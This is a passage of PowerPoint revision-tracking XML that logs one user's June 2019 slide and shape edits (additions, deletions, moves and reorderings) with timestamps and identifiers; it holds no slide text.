            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:picMk id="12" creationId="{9D04CF17-C5BB-4AED-878D-4A40796184B3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:12.818" v="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2696278330" sldId="270"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{2430A73D-447E-FD55-D35E-B0E931B61F9F}" dt="2019-06-07T12:05:19.225" v="129"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1408271386" sldId="271"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}"/>
    <pc:docChg chg="modSld sldOrd">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:30:05.790" v="1988"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:19:24.085" v="1669" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:13:03.271" v="1090" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="3" creationId="{38858550-EB68-4712-9AA3-FF450953D228}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:19:24.085" v="1669" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="4" creationId="{2DDEECF7-AF9E-4EF3-91A3-689445B25498}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:27:36.227" v="1906" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.226" v="1675" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="3" creationId="{7200B702-4D35-46CE-9CF9-B0946A6D7592}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:22:13.742" v="1820" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="4" creationId="{8AE5C81D-0FFB-4CBD-BF89-8872B36B94EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.320" v="1681" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="5" creationId="{191CC491-9D7C-4267-9080-C9575711A4F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.257" v="1677" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="6" creationId="{53E9DF78-EFAC-4F59-8611-0FEDADADCA6A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.273" v="1678" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="7" creationId="{0F04E23D-A26E-4029-B989-CC81B51B3DB5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.288" v="1679" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="8" creationId="{5B1A0ACD-7B0B-4F6B-AED4-F2F5B2C68BAC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.335" v="1682" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="9" creationId="{D718A3D6-FC8B-4691-A3BA-54C25E2D20F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.351" v="1683" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:09.304" v="1680" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="11" creationId="{27CA9ED9-F5A6-426C-8EEB-3307AB12BA3E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:20:34.867" v="1726" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="12" creationId="{6452865E-E0FD-4169-A23A-B0702A255E41}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:21:22.273" v="1784" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="13" creationId="{F96710B7-59FF-4B5B-B88E-0B3275D58AE8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:21:53.726" v="1817" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="14" creationId="{C899EB9D-31AD-4FC3-8CC6-63442DB03CEF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:27:36.227" v="1906" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="15" creationId="{D96DA130-F79F-4B78-A80E-33354F80026C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:30:05.790" v="1988"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T17:35:44.762" v="430" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T17:35:44.762" v="430" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="10" creationId="{AE22FB64-BD46-4197-9857-30F7BB9E1B68}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp ord">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:29:51.603" v="1985" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="777082745" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:29:26.697" v="1964" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="777082745" sldId="264"/>
            <ac:spMk id="3" creationId="{7441D2CA-500B-42F9-9EBD-34DA73F9EBE1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T17:37:25.716" v="433"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="777082745" sldId="264"/>
            <ac:spMk id="3" creationId="{9C49A650-BF89-427C-86D5-97CE9AEF7481}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T18:29:51.603" v="1985" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="777082745" sldId="264"/>
            <ac:spMk id="4" creationId="{E208D247-2A1E-4A5A-8014-4590A84DC036}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T17:37:20.638" v="432"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="917986403" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{E5D09AA2-5033-D1FD-C88F-876D51D24932}" dt="2019-06-04T17:37:20.638" v="432"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="3" creationId="{35EB6A3C-2096-4E1C-B888-43EBCFBB8802}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:23:18.467" v="308" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T13:13:55.051" v="52" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="109857222" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T13:13:55.051" v="52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Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:23:16.217" v="306" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:23:16.217" v="306" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="3" creationId="{38858550-EB68-4712-9AA3-FF450953D228}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:22:54.483" v="301" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:22:54.483" v="301" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="3" creationId="{F0C1F75D-E598-4FC4-BE48-3BE97ED4362F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T13:28:48.920" v="192" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="7" creationId="{08EE7223-1559-4620-9DED-F93E126C447A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T13:28:42.576" v="190" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="9" creationId="{C3928157-243E-437F-A637-49B080B226CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T13:29:02.263" v="194" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="10" creationId="{AE22FB64-BD46-4197-9857-30F7BB9E1B68}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:21:30.499" v="211" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2696278330" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{D38F75CD-21A0-B22D-2F20-5E1878E33BCA}" dt="2019-06-05T15:21:30.499" v="211" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="2" creationId="{547C136F-1F2A-459C-B71D-9B09FF34D876}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:28:47.500" v="445" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:19:35.608" v="148" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1727781075" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:10:43.966" v="94" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="3" creationId="{2E57E17D-B5F0-46C7-9504-7C20ABA2E4F1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:10:48.262" v="96" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="4" creationId="{738ABD5B-44C3-4BF8-9232-2B17C43E1C9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:19:35.608" v="148" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1727781075" sldId="261"/>
            <ac:spMk id="5" creationId="{6AA73F9F-6A4A-4B5C-8355-CDB1E8885A7C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:28:47.500" v="444" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:22:20.718" v="150"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="3" creationId="{DD76EB8B-6A81-4D96-9EA0-A486BE1999EF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:22:26.859" v="152"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="4" creationId="{4FB59183-A27C-49A7-86DA-16422FEE644E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:22:30.327" v="154"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="5" creationId="{66CFB3B5-9C58-47F1-81B7-53037E6B247E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:22:34.421" v="156"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="6" creationId="{E241DD84-B9D9-490C-BC76-6877C62AF87A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:22:51.640" v="168" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="7" creationId="{08EE7223-1559-4620-9DED-F93E126C447A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:27:25.625" v="385" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="8" creationId="{B9C82214-90D8-4118-BD54-8693622881BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:26:52.281" v="382" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="9" creationId="{C3928157-243E-437F-A637-49B080B226CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{50261BA0-1A1F-4FE7-FD14-D43195185ADC}" dt="2019-06-04T17:28:47.500" v="444" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="10" creationId="{AE22FB64-BD46-4197-9857-30F7BB9E1B68}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}"/>
    <pc:docChg chg="addSld modSld sldOrd">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{DDF2462B-1B48-8635-2892-D05F658EFBE5}" dt="2019-06-05T06:35:39.569" v="1261"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
